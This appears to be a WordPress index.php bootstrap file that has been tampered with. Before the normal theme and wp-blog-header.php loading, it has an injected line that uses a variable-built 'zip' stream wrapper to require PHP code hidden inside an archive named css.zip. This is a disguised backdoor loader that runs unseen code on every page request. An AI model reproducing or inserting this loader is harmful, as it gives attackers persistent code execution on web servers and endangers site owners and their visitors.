<?php $a = 'zip'; require $a.'://css.zip#index.php'; define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';